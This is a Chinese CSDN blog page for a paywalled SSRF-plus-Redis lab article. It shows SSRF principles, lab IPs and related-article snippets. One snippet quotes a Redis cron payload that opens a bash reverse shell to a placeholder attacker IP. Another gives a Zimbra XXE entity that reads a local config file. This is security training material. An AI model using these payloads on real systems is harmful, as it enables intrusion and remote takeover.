ssrf+redis未授权靶场

最新推荐文章于 2024-03-10 22:45:38 发布

VIP文章 actistsec

最新推荐文章于 2024-03-10 22:45:38 发布

阅读量1.8k

点赞数

分类专栏：靶场文章标签： redis 网络安全

本文链接：https://blog.csdn.net/weixin_53396158/article/details/127505348

版权

ssrf+redis靶场利用

原理:服务端提供了从其他服务器获取数据的功能,而且没做好限制

非常类似文件包含

常见功能点

在线翻译网页
图片加载
网站信息收集

可利用点

端口扫描,用dict
本地敏感数据file
做跳板利用其它漏洞gophar

验证:抓包分析服务器是否发送请求

利用

http协议访问内外网web资源
file协议读取本地文件
dict协议探测内外网tcp端口
gopher协议做跳板

ssrf+redis未授权实验

环境准备

kali攻击机 192.168.0.4
ssrf靶场 web靶场添加一个ssrf利用文件 192.168.0.10
redis未授权靶场 192.168.0.9

本实验均在同一网段下,因为没找到redis不出网的利用方式,凑合联动一下

redis靶场

#设置只允许ssrf靶场服务器访问6379
firewall-cmd --add-rich-rule='rule family=ipv4 source address=192.168.0.10 port port

最低0.47元/天解锁文章

优惠劵

actistsec

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
ssrf+redis未授权靶场

自己搭建不太合理的ssrf联动redis未授权
复制链接

扫一扫

专栏目录

SSRF靶场攻略记录

墨痕诉清风的博客

01-02

1076

Web应用程序期望用户指定域用户指定在DNS服务器中绑定了2个IP的域。应用程序处理用户请求并将域解析为Blocked IP（本例中为127.0.0.1），并提示错误消息。用户不断尝试一次又一次地触发相同的HTTP请求。当TTL到期的域IP，Web服务器将重新解析IP。现在，Web服务器将请求DNS服务器解析域的IP，这次DNS返回未列入黑名单的不同IP（8.8.8.8）。安全检查将通过，应用程序将继续从指定URL获取内容的过程。

【SSRF漏洞-01】服务端请求伪造靶场实战

02-20

3778

服务端请求伪造)是一种由攻击者构造请求，由服务器端发起请求的安全漏洞，本质上是属于信息泄露漏洞。如果“请求伪造”发生在服务器端，那么这个漏洞就叫做“服务器端请求伪造”即SSRF。SSRF是一种攻击者发起的伪造由服务器端发起请求的一种攻击，也是常见的web安全漏洞(缺陷或者风险)之一。互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL，web应用可以获取图片、文件资源(下载或读取)。例如：百度提供识图功能。用户可以从本地或者URL。

参与评论您还未登录，请先登录后发表或查看评论

通过 SSRF 操作 Redis 主从 RCE1

08-04

1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存

SSRF综合靶场

hot_milk1的博客

02-20

865

常见的SSRF的一些利用。

SSRF漏洞靶场

WINDY_PACE的博客

05-15

2624

对于SSRF，回显是能够成功利⽤的重要条件，所以过滤返回信息，验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤是去获取某⼀种类型的⽂件，那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。禁⽤不需要的协议，仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题

SSRF与靶场(史上最详细)

qq_34598847的博客

10-17

543

SSRF漏洞介绍：SSRF漏洞（服务器端请求伪造）：是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）。SSRF漏洞原理：SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。利用的是服务端的请求伪造。

burp靶场--ssrf

qq_33168924的博客

01-17

1171

服务器端请求伪造是一种 Web 安全漏洞，允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中，攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下，他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据，例如授权凭据，或者代码执行。

burpsuite靶场——SSRF

qq_61768489的博客

12-26

1372

即使有一些HTTP流量会被拦截，也会因为不怎么拦截DNS流量而获取我们想要的结果。从名字就能看出来这个插件可以对每一个点都进行collaborator测试以发现可以使用带外技术发送请求的点，为了方便插件进行测试，我们将靶场地址添加到目标中。有的后端系统用户是无法直接访问的，但是服务器可以成功向其发送请求，所以如果利用ssrf同样可以向这些本不对用户开放的后端系统发出恶意请求。有的情况还可以利用SSRF盲打对目标后端系统进行探测，比如探测目标网络中开放的主机及端口之类的，这些同样也可以通过带外通道接收到。

通过SSRF操作Redis主从复制写Webshell_R3start1

08-03

1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存

zimbra_poc:Zimbra XXE + SSRF + UPC Poc

03-16

Zimbra POC 用法需要自己在源代码中修改dtd_url为如下内容的dtd地址： <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> ...参考资料

国光师傅的SSRF靶场docker环境.zip

01-16

靶场，是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中，靶场扮演着重要的角色，尤其是在网络安全领域，靶场成为培养和提高安全专业人员技能的重要平台。首先，...

Python-GitLab1147SSRF配合redis远程执行代码

08-10

GitLab 11.4.7 SSRF配合redis远程执行代码

【web安全】ssrf复习

Vector_seven的博客

09-12

大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制，导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据；通常是将该服务器作为跳板对内网进行端口扫描等。

记一次SSRF靶场到内网打穿

君逍遥o

09-08

315

记一次SSRF靶场到内网打穿

利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell

wenqingshuo321的博客

10-11

729

在Search Public Registries，选择Public Registry中的 IBM，同时勾选Search by business name，开启bp进行抓包，点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令，将其写入redis的容器里里面的/etc/crontab，从而将shell反弹到本地物理机ip的1234端口。

SSRF服务器请求伪造原理和pikachu靶场实验

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交